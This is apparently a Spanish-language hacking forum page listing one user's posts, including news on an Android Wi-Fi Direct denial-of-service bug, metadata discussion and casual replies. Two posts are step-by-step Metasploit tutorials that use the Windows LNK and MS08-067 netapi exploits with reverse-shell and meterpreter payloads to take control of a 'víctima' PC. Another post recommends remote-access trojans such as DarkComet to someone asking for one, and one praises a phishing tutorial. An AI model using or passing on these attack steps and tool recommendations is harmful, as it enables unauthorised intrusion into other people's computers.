Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Payasako

Páginas 1 2 3 4 5
#61
Bugs y Exploits / Metasploit [Explotar Vulnerailidad LNK]
Febrero 17, 2015, 06:07:57 PM
Hola a todos de Underc0de, hoy os voy a explicar y poner los pasos para explotar la vulnerabilidad LNK de Windows con Metasploit.

Primero hay que actualizar Metasploit.
Código: text
#msfupdate


Luego configuramos Metasploit como sigue:
Código: text
msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.0.33 SRVHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set URIPATH / URIPATH => / msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.0.33 LHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LPORT 4444 LPORT => 4444 msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit


Luego en el navegador de la PC víctima visitamos la siguiente URL:
Código: text
\192.168.0.33QueHeTwEW


Entonces se abrirá el explorador de windows para visualizar los archivos compartidos que contienen el archivo .LNK que produce la ejecución del payload.

Para especificar una dirección diferente para el recurso compartido agregamos este parámetro en la configuración:
Código: text
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set UNCHOST 192.168.0.254 UNCHOST => 192.168.0.254


Esto puede ser necesario para explotar la vulnerabilidad en WAN. En este parámetro iría nuestra IP publica.

Bueno espero que os haya ayudado. ¡Saludos!
#62
Bugs y Exploits / Metasploit | Penetrar una pc. [Exploit]
Febrero 17, 2015, 06:06:43 PM

Metasploit | Penetrar una pc.

En este post os pondre un exploit , que sirve para penetrar en una pc.  Me explico mejor paso a paso. Primero teneis que abrir la consola metasploit , si no la teneis descargarla aqui: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Bueno ya tenemos abierta la consola pues ahora pondremos el exploit que queremos usar en este caso es netapi:
Citaruse exploit/windows/smb/ms08_067_netapi

Le damos enter y seguimos , ya tenemos el exploit pues procederemos a decirle a la consola que qué dirección IP queremos atacar o penetrar en este caso metemos este codigo:
Citarset RHOST 000.000.000.000 <- En 000.000.000.000 pondremos la IP a la que queremos atacar.

Ahora meteremos el payload que sera como una shell:
Citarset payload windows/shell/reverse_tcp

Vamos bien , ahora le tenemos que decir a metasploit quien somos pues para eso usaremos el comando:
Citarset LHOST 000.000.000.000 <- En 000.000.000.000 pondremos nuestra IP

Y ahora mandaremos el exploit con un simple comando:
Citarexploit

Bueno ya dejamos que cargue y eso , y una vez con acceso pues podemos poner help y te saldran muchos comandos y podras controlar la pc que pusiste. Quiero avisar que este exploit solo sirve para que la pc "víctima" tenga el puerto "3555" abierto.

Saludos :)
#63
Noticias Informáticas / Bug en Android Wi-Fi Direct permitiría que reinicien tu dispositivo.
Febrero 17, 2015, 05:59:00 PM

Se ha descubierto una vulnerabilidad en la funcionalidad de Android Wi-Fi Direct, que permite establecer una conexión directa entre dispositivos compatibles y sin intermediarios, es decir, sin un punto de acceso intermedio.

Además de dispositivos móviles, hay impresoras, cámaras y computadoras que usan Wi-Fi Direct para hacer una conexión peer-to-peer sin router inalámbrico.

El bug en cuestión, que afecta a muchos dispositivos con Android que están buscando otros productos con Wi-Fi Direct, se explota en forma remota a través de una denegación de servicio (DoS). Un atacante puede falsificar y enviar un paquete de respuesta de sondeo específicamente diseñado, hecho que produciría el reinicio del subsistema Dalvik de Android, debido a una excepción en la clase WiFiMonitor que no puede ser manejada, tal como explica el reporte de la vulnerabilidad.

Para ser más específicos, si el atacante envía un evento wpa_supplicant malformado, es la clase WifiP2PDevice la que lanza una excepción de tipo IllegalArgument Exception, que a su vez colapsa el sistema, al no poder ser manejada.
Según The Hacker News, este bug en Android Wi-Fi Direct afecta a varios dispositivos Android:
* Nexus 5 – Android 4.4.4
* Nexus 4 – Android 4.4.4
* LG D806 – Android 4.2.2
* Samsung SM-T310 – Android 4.2.2
* Motorola RAZR HD – Android 4.1.2

Core Security la reportó inicialmente a Google el 26 de septiembre pasado, pero el equipo de seguridad de Android la clasificó como de baja severidad, y explicó en repetidas ocasiones que no tienen tiempo en sus planes para lanzar un parche. Por eso, los investigadores han decidido hacerla pública.

The Register concuerda con Google en cuanto a la clasificación del bug, ya que está limitado a períodos cortos de tiempo en los que el dispositivo Android esté escaneando en busca de otros equipos con Wi-Fi Direct, además de proximidad geográfica. De hecho, el atacante tiene que estar cerca para enviar los datos malformados a la víctima. Y aun así, sostiene, su impacto está limitado a un reinicio.

De todas formas, considerando que las vulnerabilidades son algo de los más frecuente últimamente, te recomendamos leer nuestra Guía de Seguridad en Android para que tu dispositivo esté protegido.

Fuente: SeguridadPc
#64
Dudas y pedidos generales / Re:Necesito un buen RAT
Febrero 08, 2015, 03:57:22 PM
Los RATs ya no se llevan, en mi opinión es un poco pérdida de tiempo.. Pero bueno, te recomendaré algunos RATs.. (CyberGate, SpyNet, DarkComet)

Uno de esos 3, Puedes buscar por "anda a saber donde" o En algún otro foro de informática o hacking. (Cuidado con SpyNet que la mayoría andan infectados)

Sino puedes crear un exploit en la consola de Metasploit.
#65
Hacking / Re:Tutorial phishing
Enero 29, 2015, 07:19:55 PM
Mira por donde va a haber un segundo Facebook jajaja excelente tutorial. ]

Enviado desde mi LG-E400 usando Tapatalk 2

#66
Seguridad web y en servidores / Re:Rooting vps windows desde webshell
Enero 29, 2015, 07:16:10 PM
Muy útil y basico esto, ya vi un tutorial asi hace tiempo rulando por RevolutionsNet

Enviado desde mi LG-E400 usando Tapatalk 2

#67
Hacking / Re:Como despistar al atacante que intenta robar mi contraseña
Enero 29, 2015, 07:13:29 PM
También es útil utilizar la Ñ, muchos softwares de brute force no la reconocen.

Enviado desde mi LG-E400 usando Tapatalk 2

#68
Seguridad / Re:Metadatos: tus fotos podrían mostrar más de lo que ves
Enero 11, 2015, 04:42:06 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Las fotos de fb pero no tienen metados, alguien si las obtuvo?

Foto que es subida a facebook, se elimina los metadatos.

Regards,
Snifer
Muy buen post, puede servir a la hora de la Inginiería Social, pero me surgió una duda: ¿Los metadatos se borran cuando la foto se sube a una Red Social? Tipo Twitter, tuenti..

Pues depende de la red social, las de twitter por lo que tengo entendido si, pero es tan facil como que te descargues las fotos de tus amigos y hagas tus propios labs xD
Actualmente existe alguna tool o algo para obtener los metadatos? ..
#69
Noticias Informáticas / Re:Anonymous amenaza con poner fin a Facebook este mes
Enero 10, 2015, 04:33:39 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Anonymous no es lo que fue anteriormente, muchos lammers (sin sonar despectivo) compran una mascara de Guy Fawkes y hacen un vídeo amenazando o hablando puras sandeces, lo cual se convierte en perdida de credibilidad para el grupo de hacktivistas. Si analizamos la historia completa nos damos cuenta de que si bien su ataque por default es solo ddos también hay gente "very skilled" en su organización. 

Lo cierto es que poner fecha para el fin de una plataforma como la de fb es absolutamente un ridículo y solo muestra la falta de conocimiento de quien escribió ese disparate.


Enviado desde mi iPhone utilizando Tapatalk
Totalmente de acuerdo contigo, es una pérdida de tiempo creér a esta gente.
#70
Dudas y pedidos generales / Re:Ayuda con Maquina virtual
Enero 10, 2015, 01:57:08 PM
Revisa la Posición-H, Posición-Y .. Si no, busca para darle un Ajuste Automático.

Alomejor estos comandos pueden servirte:
Host + F –> Entrar en modo pantalla completa.
Host + A –> Ajustar el tamaño de la ventana.
#71
Galería / Wallpaper Underc0de :3
Enero 10, 2015, 01:17:08 PM
Hola, aquí os dejo un wallpaper que hice.. Puse eso en las esquinas por rellenar (lo veía vacío)



Link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos.
#72
Seguridad / Re:Metadatos: tus fotos podrían mostrar más de lo que ves
Enero 10, 2015, 09:58:01 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Las fotos de fb pero no tienen metados, alguien si las obtuvo?

Foto que es subida a facebook, se elimina los metadatos.

Regards,
Snifer
Muy buen post, puede servir a la hora de la Inginiería Social, pero me surgió una duda: ¿Los metadatos se borran cuando la foto se sube a una Red Social? Tipo Twitter, tuenti..
#73
Tutoriales / Re:Crear texto con lineas luminosas [Tutorial]
Enero 10, 2015, 08:36:31 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Serias tan amable de enviarme un Mp con el enlace de Descarga de PS? O Decirme algun sitio seguro de donde descargarlo.. Ah y muy bueno el tutorial, lo exprimiré al máximo.

Está en el post... You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo.
Ese es el material.. yo digo el PS.
#74
Noticias Informáticas / Re:Anonymus amenaza con poner fin a Facebook este mes
Enero 10, 2015, 08:26:10 AM
Anonymous "promete", "amenaza" y "habla" mucho, ¿Luego qué hacen? No hacen nada, simplemente dejan la web sin conexión unas horas y ya se creén que Facebook desaparecerá.
#75
Wargames y retos / Re:Reto Ingenieria Social (?)
Enero 09, 2015, 08:21:34 PM
Mola esto, el objetivo del "wargame" tiene sentido y me llama la atención, ¡A Probarlo!
#76
Softwares e ISOs / Re:CP Reparaciones - Software del Tecnico.
Enero 09, 2015, 07:51:00 PM
Íncreible, muy bueno bro, saludos.
#77
Tutoriales / Re:Crear texto con lineas luminosas [Tutorial]
Enero 09, 2015, 07:16:10 PM
Serias tan amable de enviarme un Mp con el enlace de Descarga de PS? O Decirme algun sitio seguro de donde descargarlo.. Ah y muy bueno el tutorial, lo exprimiré al máximo.

#78
Pentesting / Re:¿Como Usar SQLMAP? Mini-Tutorial
Enero 08, 2015, 02:02:48 PM
Link caído.. Arregla, voy a probar. Buen tutorial
#79
Off Topic / Re:SECURITY CHALLENGE
Enero 08, 2015, 01:42:46 PM
Madre mía, ¿Pero qué juego es este? "Tratar de registrarse" ¿Y Si viene un Noob lammer Pro 11 e intenta registrarse? Vaya forma tienen de perder usuarios.. En fín, lo probaré.
#80
Off Topic / Re:El bug del siglo en facebook
Enero 08, 2015, 01:40:58 PM
¿Enserio Mark sigue teniendo errores en la famosa red social? Me parece demasiado fuerte que todavía no los haya arreglado. JAJAJJAJA
Páginas 1 2 3 4 5